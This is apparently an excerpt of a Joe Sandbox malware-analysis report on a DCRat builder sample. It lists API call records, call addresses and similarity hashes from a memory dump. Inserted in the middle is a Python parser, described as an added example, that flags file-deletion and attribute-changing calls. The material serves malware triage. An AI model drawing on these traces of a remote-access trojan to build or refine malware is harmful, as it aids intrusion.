                                                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,004BBA89,?,00000000), ref: 004BBC64
                                                                                                                        • GetCPInfo.KERNEL32(00000000,004BBA89,?,?,?,004BBA89,?,00000000), ref: 004BBC77
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CodeInfoPageValid
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 546120528-0
                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00499A50,?,?,00000000,?,?,00498CBC,?), ref: 00499BAB
                                                                                                                        • GetLastError.KERNEL32(?,00000000,00498411,-00009570,00000000,000007F3), ref: 00499BB6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2976181284-0
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00491E55
                                                                                                                          • Part of subcall function 00493BBA: __EH_prolog.LIBCMT ref: 00493BBF
                                                                                                                        • _wcslen.LIBCMT ref: 00491EFD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog$_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2838827086-0
                                                                                                                        APIs
                                                                                                                        • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004973BC,?,?,?,00000000), ref: 00499DBC
                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00499E70
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$BuffersFlushTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1392018926-0
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00499F27,?,?,0049771A), ref: 004996E6
                                                                                                                        • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00499F27,?,?,0049771A), ref: 00499716
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00499EC7
                                                                                                                        • GetLastError.KERNEL32 ref: 00499ED4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2976181284-0
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 004B8E75
                                                                                                                          • Part of subcall function 004B8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004BCA2C,00000000,?,004B6CBE,?,00000008,?,004B91E0,?,?,?), ref: 004B8E38
                                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,004D1098,004917CE,?,?,00000007,?,?,?,004913D6,?,00000000), ref: 004B8EB1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$AllocAllocate_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2447670028-0
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(?,?), ref: 004A10AB
                                                                                                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 004A10B2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$AffinityCurrentMask
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1231390398-0
APIs
• SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0049A325,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A501
  • Part of subcall function 0049BB03: _wcslen.LIBCMT ref: 0049BB27
• SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0049A325,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A532
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: AttributesFile$_wcslen
• String ID:
• API String ID: 2673547680-0
• Opcode ID: 4ecfa755f2a56b8c94f809511cd808fc3ba18c5eea42bc5d4481c85b05fef9f4
• Instruction ID: 7da4567336add40eae5a5d3aa86f46fbcb82a6671330c1e55f07fd901b71c1fe
• Opcode Fuzzy Hash: 4ecfa755f2a56b8c94f809511cd808fc3ba18c5eea42bc5d4481c85b05fef9f4
• Instruction Fuzzy Hash: 7DF0A032240109BBDF016F61DC01FDA3B6CBB04385F448062B844D5164DB35DA94DA58
APIs
• DeleteFileW.KERNELBASE(000000FF,?,?,0049977F,?,?,004995CF,?,?,?,?,?,004C2641,000000FF), ref: 0049A1F1
  • Part of subcall function 0049BB03: _wcslen.LIBCMT ref: 0049BB27
• DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0049977F,?,?,004995CF,?,?,?,?,?,004C2641), ref: 0049A21F
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: DeleteFile$_wcslen
• String ID:
• API String ID: 2643169976-0
• Opcode ID: 49f23e063879bee95ffacd23e43bde716b07361610a80478f63b662609de3efc
• Instruction ID: 66091b323e0e795bc69dbd42893ba5731c6ae243a86ac3b7dd31863498171b15
• Opcode Fuzzy Hash: 49f23e063879bee95ffacd23e43bde716b07361610a80478f63b662609de3efc
• Instruction Fuzzy Hash: AAE092321402096BDF019F62DC45FEA3B5CBB0C38AF484076B944D2154EB66DE94DAA8
APIs
• GdiplusShutdown.GDIPLUS(?,?,?,?,004C2641,000000FF), ref: 004AACB0
• CoUninitialize.COMBASE(?,?,?,?,004C2641,000000FF), ref: 004AACB5
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: GdiplusShutdownUninitialize
• String ID:
• API String ID: 3856339756-0
• Opcode ID: fbe7a9f2470ba65ff6e79389e639eca093d199e517ed034cb898d00979c395a9
• Instruction ID: 72ac3c446e45f4765a5aaeb99d28902154658852e1ac5b12d096822c5ae113ba
• Opcode Fuzzy Hash: fbe7a9f2470ba65ff6e79389e639eca093d199e517ed034cb898d00979c395a9
• Instruction Fuzzy Hash: FFE06572644650EFCB00DF5DDD06F45FBA8FB49B20F10426AF416D3760CB746800CA98
APIs
• GetFileAttributesW.KERNELBASE(?,?,?,0049A23A,?,0049755C,?,?,?,?), ref: 0049A254
  • Part of subcall function 0049BB03: _wcslen.LIBCMT ref: 0049BB27
• GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0049A23A,?,0049755C,?,?,?,?), ref: 0049A280
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: AttributesFile$_wcslen
• String ID:
• API String ID: 2673547680-0
• Opcode ID: bd8ec688106cc5188839124bd0a069fbff5db453cd290425fc4ca81d77df0d62
• Instruction ID: 92f41b8eb0c42ab3150cf43ac24927b6c4c104bf36d6dffec1455aad79afd220
• Opcode Fuzzy Hash: bd8ec688106cc5188839124bd0a069fbff5db453cd290425fc4ca81d77df0d62
• Instruction Fuzzy Hash: E6E092325001246BCF50AB69DC05BD97B58AB193E6F0442B2FD54E3294D774DE44CAE9
APIs
• _swprintf.LIBCMT ref: 004ADEEC
  • Part of subcall function 00494092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004940A5
• SetDlgItemTextW.USER32(00000065,?), ref: 004ADF03
  • Part of subcall function 004AB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004AB579
  • Part of subcall function 004AB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004AB58A
  • Part of subcall function 004AB568: IsDialogMessageW.USER32(00010422,?), ref: 004AB59E
  • Part of subcall function 004AB568: TranslateMessage.USER32(?), ref: 004AB5AC
  • Part of subcall function 004AB568: DispatchMessageW.USER32(?), ref: 004AB5B6
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
• String ID:
• API String ID: 2718869927-0
• Opcode ID: 410811a6446bb9162142bdf25498c1426c51be711ef6ea674cb5b9cc92c1cb5d
• Instruction ID: 3a86a99ce39ccded516fc5eddc88705397ddf5bf9efec9cff10bcbec7ecb2f42
• Opcode Fuzzy Hash: 410811a6446bb9162142bdf25498c1426c51be711ef6ea674cb5b9cc92c1cb5d
• Instruction Fuzzy Hash: 01E09B7140024836DF01AB62DC0AFAE3B6C5B15789F44046BB204D60A3EA7DDA108669
APIs
• GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004A0836
• LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0049F2D8,Crypt32.dll,00000000,0049F35C,?,?,0049F33E,?,?,?), ref: 004A0858
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystem
• String ID:
• API String ID: 1175261203-0
• Opcode ID: 78a8e66b10ed74809f63858659f6c81da2c399d7ab82d3b1482a16c83d955b8d
• Instruction ID: 980843a91721c037fb59c0f2af8d88ae1236e2a97f4c37d5f84624d76595fd34
• Opcode Fuzzy Hash: 78a8e66b10ed74809f63858659f6c81da2c399d7ab82d3b1482a16c83d955b8d
• Instruction Fuzzy Hash: C0E012764001186ADB11AB969C05FDA7BACEF0D392F04407A7645D2104D678DA848AB8
APIs
• GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 004AA3DA
• GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 004AA3E1
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: BitmapCreateFromGdipStream
• String ID:
• API String ID: 1918208029-0
• Opcode ID: 30a80a0e9f626ac4cca01e74eee7bc4404326b1541f45873b3644a386dcf5d58
• Instruction ID: f98f26f74c1d697cfa5532629245b57f3e6aff5050d6640115428a1d29e8298b
• Opcode Fuzzy Hash: 30a80a0e9f626ac4cca01e74eee7bc4404326b1541f45873b3644a386dcf5d58
• Instruction Fuzzy Hash: 69E0ED71501218EBCB60DF56C545B99BBF8EB15364F10C05FA85697201E378AE04DBA5
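The function records above are machine output, but they all share one layout, so a small parser lets an analyst pull out call sites, call nesting and the similarity identifiers instead of reading them by eye. What follows is an added example, not code from the Joe Sandbox report or from Joe Security: RECORDS_TEXT is a constructed excerpt copied from three of the records on this page (the SetFileAttributesW, DeleteFileW and GetFileAttributesW functions) and trimmed to the fields the parser reads; the watch-list of file-tampering APIs is an analyst choice and is an assumption, not a classification the report makes; and the RVA computation relies on the "Offset: 00490000, based on PE: true" value each record carries on its Source File line.

```python
"""Parse Joe Sandbox execution-graph function records (the layout of this listing) for triage.
Added example, not part of the Joe Sandbox report or its tooling. RECORDS_TEXT is a constructed
excerpt copied from three records on this page, trimmed to the fields used; labels and layout are
the report's own. FILE_TAMPER_APIS is an analyst watch-list chosen here (an assumption)."""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Optional

RECORDS_TEXT = """\
APIs
• SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0049A325,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A501
  • Part of subcall function 0049BB03: _wcslen.LIBCMT ref: 0049BB27
• SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0049A325,?,?,?,0049A175,?,00000001,00000000,?,?), ref: 0049A532
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• API ID: AttributesFile$_wcslen
• API String ID: 2673547680-0
• Opcode ID: 4ecfa755f2a56b8c94f809511cd808fc3ba18c5eea42bc5d4481c85b05fef9f4
APIs
• DeleteFileW.KERNELBASE(000000FF,?,?,0049977F,?,?,004995CF,?,?,?,?,?,004C2641,000000FF), ref: 0049A1F1
  • Part of subcall function 0049BB03: _wcslen.LIBCMT ref: 0049BB27
• DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0049977F,?,?,004995CF,?,?,?,?,?,004C2641), ref: 0049A21F
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• API ID: DeleteFile$_wcslen
• API String ID: 2643169976-0
• Opcode ID: 49f23e063879bee95ffacd23e43bde716b07361610a80478f63b662609de3efc
APIs
• GetFileAttributesW.KERNELBASE(?,?,?,0049A23A,?,0049755C,?,?,?,?), ref: 0049A254
  • Part of subcall function 0049BB03: _wcslen.LIBCMT ref: 0049BB27
• GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0049A23A,?,0049755C,?,?,?,?), ref: 0049A280
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• API ID: AttributesFile$_wcslen
• API String ID: 2673547680-0
• Opcode ID: bd8ec688106cc5188839124bd0a069fbff5db453cd290425fc4ca81d77df0d62
"""

# "<api>.<module>(<args>), ref: <va>" or, for CRT calls, "<api>.<module> ref: <va>" with no args
API_RE = re.compile(r"^([^\s.(]+)\.([A-Za-z0-9_]+)(?:\((.*)\),)? ref: ([0-9A-F]{8})$")
SUBCALL_RE = re.compile(r"^Part of subcall function ([0-9A-F]{8}): (.+)$")
OFFSET_RE = re.compile(r"Offset: ([0-9A-F]{8}), based on PE: true")
FIELD_RE = re.compile(r"^(API ID|API String ID|Opcode ID|Instruction ID|Opcode Fuzzy Hash|Instruction Fuzzy Hash|String ID): ?(.*)$")

@dataclass
class ApiCall:
    name: str
    module: str
    ref: int                            # virtual address of the call site in the dump
    args: tuple                         # argument column as reported; "?" means unresolved
    via_subcall: Optional[int] = None   # address of the callee that made the call, if indirect

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    image_base: Optional[int] = None    # "Offset:" value from the Source File line
    fields: dict = field(default_factory=dict)

    def rva(self, va: int) -> int:
        """Call-site address relative to the dumped image base, for lookup in the on-disk PE."""
        return va - self.image_base

def parse_records(text: str) -> list:
    """Split the listing at each 'APIs' header and collect that record's calls and identifiers."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue
        body, sub = line[1:].strip(), None
        m = SUBCALL_RE.match(body)
        if m:                           # call made inside a callee: keep it, but mark the callee
            sub, body = int(m.group(1), 16), m.group(2)
        m = API_RE.match(body)
        if m:
            name, module, args, ref = m.groups()
            argv = tuple(args.split(",")) if args is not None else ()
            cur.calls.append(ApiCall(name, module, int(ref, 16), argv, sub))
        elif body.startswith("Source File:") and (m := OFFSET_RE.search(body)):
            cur.image_base = int(m.group(1), 16)
        elif m := FIELD_RE.match(body):
            cur.fields[m.group(1)] = m.group(2)
        # anything else (Associated:, Snapshot File:) is ignored
    return records

FILE_TAMPER_APIS = {"DeleteFileW", "SetFileAttributesW"}   # assumption: analyst watch-list

def file_tampering_sites(records) -> list:
    """(api, module, rva) for every direct watch-list call, one entry per call site."""
    return [(c.name, c.module, r.rva(c.ref))
            for r in records for c in r.calls
            if c.via_subcall is None and c.name in FILE_TAMPER_APIS]

def opcode_ids_by_api_string_id(records) -> dict:
    """Group Opcode IDs under their API String ID; several per key means several functions share it."""
    groups = defaultdict(list)
    for r in records:
        groups[r.fields.get("API String ID")].append(r.fields.get("Opcode ID"))
    return dict(groups)
```

Running parse_records over RECORDS_TEXT and then file_tampering_sites gives four watch-list call sites (RVAs 0xA501, 0xA532, 0xA1F1, 0xA21F), each kept separate because the report lists two distinct call addresses per function, one under KERNELBASE and one under KERNEL32. opcode_ids_by_api_string_id shows that, in these records, API String ID 2673547680-0 covers two functions with different Opcode IDs (the SetFileAttributesW and GetFileAttributesW functions, which share the API ID AttributesFile$_wcslen), so that identifier should be treated as a key on the API-name set rather than on a particular function body.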
APIs
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004B2BAA
• ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 004B2BB5
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: Value___vcrt____vcrt_uninitialize_ptd
• String ID:
• API String ID: 1660781231-0
• Opcode ID: e8337b5ea596dace2d24cbbf68d4dcaef551ec861eedd2dc0108eb658cdc64e5
• Instruction ID: d8e0adbb86829a34824567f9136ec0686e0ff4d88a29ad7e9f659909d76c0475
                                                                                                                        • Opcode Fuzzy Hash: e8337b5ea596dace2d24cbbf68d4dcaef551ec861eedd2dc0108eb658cdc64e5
                                                                                                                        • Instruction Fuzzy Hash: 85D0A73515C204284C142E732B0B5D52745DD427797B0029FE020955C1DEDCB241603D
APIs
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: ItemShowWindow
• String ID:
• API String ID: 3351165006-0
• Opcode ID: d606821fcd5b24af777ef7acff3c5bbfe3b2795dd257ae0fcd2c18a191c789ff
• Instruction ID: 38507aa4bce7759b209deb065d0b2e24d959bf4ce3325fbd2b9cff40bb41cacc
• Opcode Fuzzy Hash: d606821fcd5b24af777ef7acff3c5bbfe3b2795dd257ae0fcd2c18a191c789ff
• Instruction Fuzzy Hash: 1BC0123205C200BECB010FB4DD09C3BBBA8ABA5312F04C928B0A5C0060C238C920DB11
APIs
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: e958ce177d2911b3f235ba2d37dc50091414d56885b1803506dbda40529ef060
• Instruction ID: b470929f57b928bd9e7da2d64547c87eb2db81534653e5f29aeb857eaad70d1f
• Opcode Fuzzy Hash: e958ce177d2911b3f235ba2d37dc50091414d56885b1803506dbda40529ef060
• Instruction Fuzzy Hash: D4C1D770A002569FEF15CF24C484BAA7FA6EF55310F0801BFDC469B3A6DB38A944CB65
APIs
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: bd559672166abb9393736e3ada456d1525cbc7eeee186b31a65d18e2dbcb2439
• Instruction ID: cc1a16d98a56a6ef7464ac1c5c4a778c40a53508cb2cd53d92783100954775ed
• Opcode Fuzzy Hash: bd559672166abb9393736e3ada456d1525cbc7eeee186b31a65d18e2dbcb2439
• Instruction Fuzzy Hash: 5471D071500B449EDF31DF70C855AE7BBE9AB16306F00093FE6AB83241DA3A6A44CF15
APIs
• __EH_prolog.LIBCMT ref: 00498289
  • Part of subcall function 004913DC: __EH_prolog.LIBCMT ref: 004913E1
  • Part of subcall function 0049A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0049A598
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
